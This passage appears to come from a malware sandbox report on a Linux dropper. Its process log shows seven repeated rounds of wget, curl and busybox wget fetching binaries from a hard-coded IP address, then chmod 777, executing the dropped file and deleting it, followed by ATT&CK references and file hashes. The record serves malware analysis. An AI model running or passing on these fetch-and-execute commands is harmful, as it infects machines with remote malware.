/usr/bin/curlcurl -O http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:963
-
-
/bin/chmodchmod 777 NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo./NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm NggYe21V7fR2qPhHutDDZ6FcfmSHlvAUKo2⤵PID:966
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:967
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:969
-
-
/bin/chmodchmod 777 j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH./j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm j8AXZLN0hZYfFAZUOpzRegjv3yYxibWnHH2⤵PID:972
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:973
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:975
-
-
/bin/chmodchmod 777 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw4./9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm 9a8vVBPzDBghrVhDazO8AMeLz3IQPNSCw42⤵PID:978
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:979
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:980
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:981
-
-
/bin/chmodchmod 777 Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- File and Directory Permissions Modification
PID:982
-
-
/tmp/Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ./Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵
- Executes dropped EXE
PID:983
-
-
/bin/rmrm Jp39FVVv6PZEC7tLKpGzPpbisA5SSi3KQZ2⤵PID:984
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:985
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:986
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:987
-
-
/bin/chmodchmod 777 bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd./bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm bVXkt0UfDH9u36c6UOpntQyqGii9xI7RNd2⤵PID:990
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:991
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:993
-
-
/bin/chmodchmod 777 glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- File and Directory Permissions Modification
PID:994
-
-
/tmp/glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ./glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵
- Executes dropped EXE
PID:995
-
-
/bin/rmrm glOEDMSugu49vvehkcq9FJI8gMhX23cMjZ2⤵PID:996
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:997
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:998
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:999
-
-
/bin/chmodchmod 777 qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- File and Directory Permissions Modification
PID:1000
-
-
/tmp/qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p./qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵
- Executes dropped EXE
PID:1001
-
-
/bin/rmrm qmdyeZYAB0QwRHYivIlB34aa0XU9RXxf3p2⤵PID:1002
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97